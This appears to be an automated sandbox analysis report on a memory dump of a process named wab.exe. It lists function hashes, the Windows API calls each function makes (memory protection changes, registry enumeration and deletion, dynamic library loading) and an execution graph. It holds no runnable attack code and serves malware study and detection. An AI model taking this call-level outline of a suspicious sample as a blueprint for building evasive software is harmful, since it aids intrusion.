                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID: "
                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                • String ID: URL
                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: F^@
                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                • String ID: WinPos
                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                • API String ID: 2773794195-880857682
                                                                                                                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.6%
                                                                                                                                                Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                Total number of Nodes:844
                                                                                                                                                Total number of Limit Nodes:17
                                                                                                                                                execution_graph 34076 43ee43 59 API calls 34078 405e41 14 API calls 33889 429046 memset memset memcpy memset memset 33890 432447 17 API calls 33891 401445 memcpy memcpy DialogBoxParamA 33892 413848 strcmp 33893 41104f 16 API calls 33895 411a2d 14 API calls 34083 424852 76 API calls 33897 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34084 432654 15 API calls 33902 40b05a LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33905 401060 41 API calls 32984 410663 EnumResourceNamesA 33907 40b865 8 API calls 33908 427867 15 API calls 34087 425e13 87 API calls 33909 404469 22 API calls 34089 41466f 16 API calls 33912 425474 16 API calls 33913 426474 memcpy memset memset memcpy 34091 42e27a 61 API calls 34094 411201 RtlDeleteCriticalSection 33916 444003 __dllonexit 34098 404207 modf 33918 410808 memset SHGetPathFromIDList SendMessageA 33919 42a80b 27 API calls 33863 444a0f 33864 444a26 33863->33864 33866 444a94 33863->33866 33864->33866 33870 444a4e 33864->33870 33867 444a45 33867->33866 33868 444a75 VirtualProtect 33867->33868 33868->33866 33869 444a84 VirtualProtect 33868->33869 33869->33866 33871 444a53 33870->33871 33875 444a94 33871->33875 33877 444a6b 33871->33877 33873 444a5c 33874 444a75 VirtualProtect 33873->33874 33873->33875 33874->33875 33876 444a84 VirtualProtect 33874->33876 33876->33875 33878 444a71 33877->33878 33879 444a75 VirtualProtect 33878->33879 33881 444a94 33878->33881 33880 444a84 VirtualProtect 33879->33880 33879->33881 33880->33881 34100 40420c 12 API calls 34104 409213 10 API calls 33922 411014 15 API calls 34105 404217 26 API calls 34106 403a18 strlen WriteFile 33923 43f41d 17 API calls 33924 43f022 19 API calls 34109 408e21 7 API calls 34110 411222 RtlEnterCriticalSection 34113 43ee2d 112 API calls 34114 411231 RtlLeaveCriticalSection 34115 403632 21 API calls 34118 413e34 19 API calls 33933 427434 76 API calls 33934 423c3b 19 API calls 33938 405cc1 65 API calls 33940 424852 75 API calls 34120 4092cb 17 API calls 34121 4442cf _exit _c_exit 33944 43ecc8 18 API calls 34122 408ed5 7 API calls 34124 405edc SetDlgItemTextA GetDlgItemTextA 33949 424852 79 API calls 33950 424852 76 API calls 34125 427645 42 API calls 33953 4338e6 15 API calls 34127 43eae9 149 API calls 33955 4100ec 42 API calls 33957 426ced memset memset memcpy 34128 40c2ef 43 API calls 34129 40def0 9 API calls 34130 403af4 54 API calls 33962 43e8f9 122 API calls 34131 4016fc NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34132 4336fd 17 API calls 34133 403e83 34 API calls 34134 42968a 11 API calls 34135 40da89 42 API calls 33964 425e13 21 API calls 33966 43ec88 119 API calls 33967 426c8e 41 API calls 34136 433a8f 18 API calls 33969 409c8d _strcmpi 34138 44128b memcmp 34143 40aa94 7 API calls 34145 424852 111 API calls 34146 43f698 21 API calls 34151 4276ad 47 API calls 34152 423ab3 18 API calls 34154 43f2b7 17 API calls 33982 43f4ba 18 API calls 34155 424852 85 API calls 34156 4442bb _XcptFilter 33987 444941 ??3@YAXPAX 33989 424852 77 API calls 34157 43ef44 20 API calls 33990 42d14a 22 API calls 34158 404348 19 API calls 33991 40b94b 138 API calls 34160 424852 76 API calls 34161 40c750 59 API calls 33994 414557 memset memset 33995 42523b 79 API calls 33997 40ad58 30 API calls 33999 44315e 44 API calls 34000 41055b WritePrivateProfileStringA GetPrivateProfileStringA 34165 413f5c 18 API calls 34167 43f361 134 API calls 34004 440162 17 API calls 34005 444963 FreeLibrary 34006 429d69 memcpy 34168 40176b ExitProcess 34170 43eb6e 17 API calls 34008 437972 110 API calls 34009 405972 40 API calls 34172 442f71 _mbscpy 34011 403577 20 API calls 34014 44497b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34017 444905 _onexit __dllonexit 34018 43ed07 20 API calls 32985 410507 32988 4103e0 32985->32988 32987 410527 32989 4103ec 32988->32989 32990 4103fe GetPrivateProfileIntA 32988->32990 32993 4102f8 memset _itoa WritePrivateProfileStringA 32989->32993 32990->32987 32992 4103f9 32992->32987 32993->32992 34174 415b07 memcpy memcpy memcpy memcpy 34175 40af07 8 API calls 34021 414d0c 22 API calls 34022 433513 19 API calls 34179 424852 83 API calls 34026 40a117 memset sprintf SendMessageA 34180 40c319 125 API calls 34181 40b31a memset memset _mbsicmp 34028 410d1d 18 API calls 34185 441727 38 API calls 34030 433126 16 API calls 34187 42732a 24 API calls 32994 44412e 33013 44431c 32994->33013 32996 44413a GetModuleHandleA 32997 44414c __set_app_type __p__fmode __p__commode 32996->32997 32999 4441de 32997->32999 33000 4441e6 __setusermatherr 32999->33000 33001 4441f2 32999->33001 33000->33001 33014 444306 _controlfp 33001->33014 33003 4441f7 _initterm __getmainargs _initterm 33004 44424e GetStartupInfoA 33003->33004 33006 444282 GetModuleHandleA 33004->33006 33015 40cc66 33006->33015 33010 4442b3 _cexit 33012 4442e8 33010->33012 33011 4442ac exit 33011->33010 33013->32996 33014->33003 33066 404a94 LoadLibraryA 33015->33066 33017 40cc86 33017->33010 33017->33011 33018 40cc82 33018->33017 33074 41067e 33018->33074 33020 40cc91 33078 40c9f7 ??2@YAPAXI 33020->33078 33022 40ccbd 33092 407a4b 33022->33092 33027 40cce6 33110 409596 memset 33027->33110 33028 40ccfa 33115 409465 memset 33028->33115 33033 407bbf _strcmpi 33037 40cd10 33033->33037 33034 40cea3 ??3@YAXPAX 33035 40cec1 DeleteObject 33034->33035 33036 40ced5 33034->33036 33035->33036 33139 4076d7 ??3@YAXPAX ??3@YAXPAX 33036->33139 33039 40cd14 RegDeleteKeyA 33037->33039 33040 40cd29 EnumResourceTypesA 33037->33040 33039->33034 33042 40cd51 MessageBoxA 33040->33042 33043 40cd69 33040->33043 33041 40cee6 33140 4045bd ??3@YAXPAX 33041->33140 33042->33034 33045 40cdc2 CoInitialize 33043->33045 33120 40cb90 33043->33120 33137 40c946 strncat memset RegisterClassA CreateWindowExA 33045->33137 33046 40ceef 33141 4076d7 ??3@YAXPAX ??3@YAXPAX 33046->33141 33049 40cdd3 ShowWindow UpdateWindow LoadAcceleratorsA 33138 40bfb1 PostMessageA 33049->33138 33053 40cdc0 33053->33045 33054 40cd83 ??3@YAXPAX 33054->33036 33056 40cda6 DeleteObject 33054->33056 33056->33036 33058 40ce1b GetMessageA 33059 40ce9d 33058->33059 33060 40ce2f 33058->33060 33059->33034 33061 40ce35 TranslateAccelerator 33060->33061 33063 40ce67 IsDialogMessage 33060->33063 33064 40ce5b IsDialogMessage 33060->33064 33061->33060 33062 40ce8f GetMessageA 33061->33062 33062->33059 33062->33061 33063->33062 33065 40ce79 TranslateMessage DispatchMessageA 33063->33065 33064->33062 33064->33063 33065->33062 33067 404abf GetProcAddress 33066->33067 33071 404ae7 33066->33071 33068 404ad8 FreeLibrary 33067->33068 33070 404acf 33067->33070 33069 404ae3 33068->33069 33068->33071 33069->33071 33070->33068 33072 404af7 MessageBoxA 33071->33072 33073 404b0e 33071->33073 33072->33018 33073->33018 33075 410687 LoadLibraryA 33074->33075 33076 4106ac 33074->33076 33075->33076 33077 41069b GetProcAddress 33075->33077 33076->33020 33077->33076 33079 40ca28 ??2@YAPAXI 33078->33079 33081 40ca46 33079->33081 33082 40ca4d 33079->33082 33149 40400d 6 API calls 33081->33149 33084 40ca86 33082->33084 33085 40ca79 DeleteObject 33082->33085 33142 406e26 33084->33142 33085->33084 33087 40ca8b 33145 4019b4 33087->33145 33090 4019b4 strncat 33091 40cadf _mbscpy 33090->33091 33091->33022 33151 4076d7 ??3@YAXPAX ??3@YAXPAX 33092->33151 33094 407a86 33097 4077ae malloc memcpy ??3@YAXPAX ??3@YAXPAX 33094->33097 33098 407b6b 33094->33098 33100 407b09 ??3@YAXPAX 33094->33100 33105 407b93 33094->33105 33155 4076fd 7 API calls 33094->33155 33156 406cce 33094->33156 33097->33094 33098->33105 33164 4077ae 33098->33164 33100->33094 33152 4077e4 33105->33152 33106 407bbf 33107 407be6 33106->33107 33108 407bc7 33106->33108 33107->33027 33107->33028 33108->33107 33109 407bd0 _strcmpi 33108->33109 33109->33107 33109->33108 33170 409570 33110->33170 33112 4095c5 33175 4094a2 33112->33175 33116 409570 3 API calls 33115->33116 33117 409494 33116->33117 33195 4093dd 33117->33195 33209 4023a9 33120->33209 33126 40cbf4 33298 40cafa 7 API calls 33126->33298 33127 40cbef 33130 40cc60 33127->33130 33250 40c12b memset GetModuleFileNameA strrchr 33127->33250 33130->33053 33130->33054 33133 40cc0e 33277 40ad59 33133->33277 33137->33049 33138->33058 33139->33041 33140->33046 33141->33017 33150 406d65 memset _mbscpy 33142->33150 33144 406e3d CreateFontIndirectA 33144->33087 33146 4019e0 33145->33146 33147 4019c1 strncat 33146->33147 33148 4019e4 memset LoadIconA 33146->33148 33147->33146 33148->33090 33149->33082 33150->33144 33151->33094 33153 4077f4 33152->33153 33154 4077ea ??3@YAXPAX 33152->33154 33153->33106 33154->33153 33155->33094 33157 406cd5 malloc 33156->33157 33158 406d1b 33156->33158 33160 406d11 33157->33160 33161 406cf6 33157->33161 33158->33094 33160->33094 33162 406d0a ??3@YAXPAX 33161->33162 33163 406cfa memcpy 33161->33163 33162->33160 33163->33162 33165 4077c7 33164->33165 33166 4077bc ??3@YAXPAX 33164->33166 33168 406cce 3 API calls 33165->33168 33167 4077d2 33166->33167 33169 4076fd 7 API calls 33167->33169 33168->33167 33169->33105 33186 406d34 GetModuleFileNameA 33170->33186 33172 409576 strrchr 33173 409585 33172->33173 33174 409588 _mbscat 33172->33174 33173->33174 33174->33112 33187 4446d0 33175->33187 33180 40907d 3 API calls 33181 4094ea EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33180->33181 33182 409536 LoadStringA 33181->33182 33183 40954c 33182->33183 33183->33182 33185 409564 33183->33185 33194 4090eb memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33183->33194 33185->33034 33186->33172 33188 4094af _mbscpy _mbscpy 33187->33188 33189 40907d 33188->33189 33190 4446d0 33189->33190 33191 40908a memset GetPrivateProfileStringA 33190->33191 33192 4090e5 33191->33192 33193 4090d5 WritePrivateProfileStringA 33191->33193 33192->33180 33193->33192 33194->33183 33205 406d1f GetFileAttributesA 33195->33205 33197 4093e6 33198 40945f 33197->33198 33199 4093eb _mbscpy _mbscpy GetPrivateProfileIntA 33197->33199 33198->33033 33206 408fe9 GetPrivateProfileStringA 33199->33206 33201 40943a 33207 408fe9 GetPrivateProfileStringA 33201->33207 33203 40944b 33208 408fe9 GetPrivateProfileStringA 33203->33208 33205->33197 33206->33201 33207->33203 33208->33198 33300 409989 33209->33300 33212 401e60 memset 33339 41072b 33212->33339 33215 401eb9 33370 406e81 strlen _mbscat _mbscpy _mbscat 33215->33370 33216 401ecb 33354 406d1f GetFileAttributesA 33216->33354 33219 401edd strlen strlen 33221 401f1f 33219->33221 33222 401f0c 33219->33222 33355 406d1f GetFileAttributesA 33221->33355 33371 406e81 strlen _mbscat _mbscpy _mbscat 33222->33371 33225 401f2c 33356 401c30 33225->33356 33229 401c30 7 API calls 33231 401f6c 33229->33231 33230 401f88 33232 401f93 memset 33230->33232 33233 40217e 33230->33233 33368 410411 RegOpenKeyExA 33231->33368 33372 4104d7 RegEnumKeyExA 33232->33372 33235 40219f _strcmpi 33233->33235 33236 40218c ExpandEnvironmentStringsA 33233->33236 33235->33126 33235->33127 33369 406d1f GetFileAttributesA 33236->33369 33238 402175 RegCloseKey 33238->33233 33239 401fd0 atoi 33240 401fe6 memset memset sprintf 33239->33240 33248 401fc0 33239->33248 33373 410493 33240->33373 33243 40215c 33243->33238 33244 40206d memset memset strlen strlen 33244->33248 33245 4020d4 strlen strlen 33245->33248 33246 406e81 strlen _mbscat _mbscpy _mbscat 33246->33248 33247 406d1f GetFileAttributesA 33247->33248 33248->33238 33248->33239 33248->33243 33248->33244 33248->33245 33248->33246 33248->33247 33249 40215e _mbscpy 33248->33249 33380 4104d7 RegEnumKeyExA 33248->33380 33249->33238 33251 40c17b 33250->33251 33252 40c17e _mbscat _mbscpy _mbscpy 33250->33252 33251->33252 33253 40c1f6 33252->33253 33254 40c26b 33253->33254 33255 40c25b GetWindowPlacement 33253->33255 33256 40c291 33254->33256 33401 4017d1 GetSystemMetrics GetSystemMetrics SetWindowPos 33254->33401 33255->33254 33394 40989e 33256->33394 33260 40b783 33261 40b7e2 33260->33261 33266 40b797 33260->33266 33404 406a00 LoadCursorA SetCursor 33261->33404 33263 40b7e7 33405 410411 RegOpenKeyExA 33263->33405 33406 40472f 33263->33406 33414 404780 33263->33414 33417 403c03 33263->33417 33493 410166 33263->33493 33264 40b79e _mbsicmp 33264->33266 33265 40b7fb 33267 407bbf _strcmpi 33265->33267 33266->33261 33266->33264 33496 40b340 10 API calls 33266->33496 33270 40b80b 33267->33270 33268 40b855 SetCursor 33268->33133 33270->33268 33271 40b84c qsort 33270->33271 33271->33268 33278 40ad6d 33277->33278 33857 409b5a SendMessageA ??2@YAPAXI ??3@YAXPAX 33277->33857 33280 40ad75 33278->33280 33281 40ad7e GetStdHandle 33278->33281 33856 406ab8 CreateFileA 33280->33856 33282 40ad7b 33281->33282 33284 40ad94 33282->33284 33285 40ae8c 33282->33285 33858 406a00 LoadCursorA SetCursor 33284->33858 33862 406b15 9 API calls 33285->33862 33288 40ae95 33299 40c2d6 28 API calls 33288->33299 33289 40ada1 33290 40ade6 33289->33290 33296 40ae00 33289->33296 33859 40a2db strlen WriteFile 33289->33859 33290->33296 33860 40a3f8 12 API calls 33290->33860 33293 40ae35 33294 40ae75 CloseHandle 33293->33294 33295 40ae7e SetCursor 33293->33295 33294->33295 33295->33288 33296->33293 33861 406b15 9 API calls 33296->33861 33298->33127 33299->33130 33312 40979f 33300->33312 33303 4099ed memcpy memcpy 33304 409a47 33303->33304 33304->33303 33305 409a85 ??2@YAPAXI ??2@YAPAXI 33304->33305 33309 408b27 12 API calls 33304->33309 33307 409ac1 ??2@YAPAXI 33305->33307 33308 409af8 33305->33308 33307->33308 33322 409909 33308->33322 33309->33304 33311 4023b8 33311->33212 33313 4097b1 33312->33313 33314 4097aa 